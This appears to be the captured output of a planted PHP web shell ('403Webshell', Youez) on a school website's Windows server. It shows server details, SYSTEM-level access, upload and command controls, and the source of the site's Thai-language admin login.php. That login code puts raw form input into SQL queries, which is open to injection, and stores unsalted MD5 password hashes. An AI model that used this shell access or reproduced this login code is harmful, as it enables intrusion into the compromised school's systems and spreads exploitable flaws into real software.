403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/nongplamor_new/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/nongplamor_new/modules/admin/login.php
    <TABLE cellSpacing=0 cellPadding=0 width=1000 height=500 border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>
				<TABLE width="700" align=center cellSpacing=0 cellPadding=0 border=0>
				<TR>
					<TD height="1" class="dotline"></TD>
				</TR>
				<TR>
					<TD>
<?

//////////////////////		 เพิ่ม  สมาชิกออนไลน์   ////////////////////////////
			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$db->del(TB_useronline," useronline='".$_SESSION['user_user']."' "); 
			$db->closedb ();
//echo "$_POST[username]<br>";
//echo "$_POST[password]<br>";
//echo "".md5($_POST[password])."<br>";
//Check Admin
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_POST[username]."' AND password='".md5($_POST[password])."'  "); 
$rows[admin] = $db->rows($res[admin]); 
if($rows[admin]){
	$arr[admin] = $db->fetch($res[admin]);
}
$db->closedb ();
if(USE_CAPCHA){
	if($_SESSION['security_code'] != $_POST['security_code'] OR empty($_POST['security_code'])) {
		echo "<script language='javascript'>" ;
		echo "alert('!!!! กรุณากรอกโค๊ดให้ถูกต้อง !!!!')" ;
		echo "</script>" ;
		echo "<script language='javascript'>javascript:history.go(-1)</script>";
		exit();
	}
}

//Can Login
if($arr[admin][id]){
	//Login ผ่าน
	ob_start();
	$_SESSION['admin_user'] = $_POST[username] ;
	$_SESSION['admin_pwd'] = md5($_POST[password]) ;

	//////////////////////		 เพิ่ม  สมาชิกออนไลน์   ////////////////////////////

			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$res[user2] = $db->select_query("SELECT * FROM ".TB_useronline." WHERE useronline='".$_SESSION['admin_user']."' ");
			$rows[user2] = $db->rows($res[user2]); 
			$db->closedb ();
			
			if($rows[user2]){

				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_useronline,array(
					"post_date"=>"".$_SESSION['timestamp2'].""
//					"useronline"=>"".$_SESSION['user_user'].""
				)," useronline='".$_SESSION['admin_user']."' ");
				$db->closedb ();
			
			}else{
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);	
				$db->add_db(TB_useronline,array(
					"post_date"=>"".$_SESSION['timestamp2']."",
					"useronline"=>"".$_SESSION['admin_user'].""
			));
			
			}
			
			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$db->del(TB_useronline," post_date<$timeout "); 
			$db->closedb ();


	session_write_close();
	ob_end_flush();
					$timeoutseconds=10*60;
			$_SESSION['timestamp2']=time();
			$timeout=$_SESSION['timestamp2'] - $timeoutseconds;

?>
<BR><BR>
<CENTER><A HREF="?name=admin&file=main"><IMG SRC="images/icon/login-welcome.gif" BORDER="0"></A><BR><BR>
<FONT COLOR="#336600"><B>ได้ทำการเข้าระบบเรียบร้อยแล้ว</B></FONT><BR><BR>
<A HREF="?name=admin&file=main"><B>เข้าหน้าหลักผู้ดูแลระบบ</B></A>
</CENTER>
<meta http-equiv='refresh' content='1 ;url=?name=admin&file=main'><BR>
<BR><BR>
<?
}else{
	//Login ไม่ผ่าน
?>
					<BR><BR>
					<CENTER><B><FONT COLOR="#FF0000">ชื่อผู้ใช้ หรือ รหัสผ่าน ไม่ถูกต้อง กรุณาตรวจสอบ</FONT></B></CENTER>
					<FORM METHOD=POST ACTION="?name=admin&file=login">
					<TABLE width=300 align=center>
					<TR>
						<TD width="100" align="right"><B>ชื่อผู้ใช้ : </B></TD>
						<TD><INPUT TYPE="text" NAME="username"></TD>
					</TR>
					<TR>
						<TD width="100" align="right"><B>รหัสผ่าน : </B></TD>
						<TD><INPUT TYPE="password" NAME="password"></TD>
					</TR>
<?
if(USE_CAPCHA){
?>
					<TR>
						<TD width="100" align="right">
						<?if(CAPCHA_TYPE == 1){ 
							echo "<img src=\"capcha/CaptchaSecurityImages.php?width=".CAPCHA_WIDTH."&height=".CAPCHA_HEIGHT."&characters=".CAPCHA_NUM."\" width=\"".CAPCHA_WIDTH."\" height=\"".CAPCHA_HEIGHT."\" align=\"absmiddle\" />";
						}else if(CAPCHA_TYPE == 2){ 
							echo "<img src=\"capcha/val_img.php?width=".CAPCHA_WIDTH."&height=".CAPCHA_HEIGHT."&characters=".CAPCHA_NUM."\" width=\"".CAPCHA_WIDTH."\" height=\"".CAPCHA_HEIGHT."\" align=\"absmiddle\" />";
						};?>
						</TD>
						<TD><input name="security_code" type="text" id="security_code" maxlength="6" ></TD>
					</TR>
<?
}
?>
					<TR>
						<TD width="100" align="right"></TD>
						<TD><INPUT TYPE="submit" VALUE=" เข้าระบบ "></TD>
					</TR>
					</TABLE>
					</FORM>
<?
}
?>
					</TD>
				</TR>
			</TABLE>
			<BR><BR>
			<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit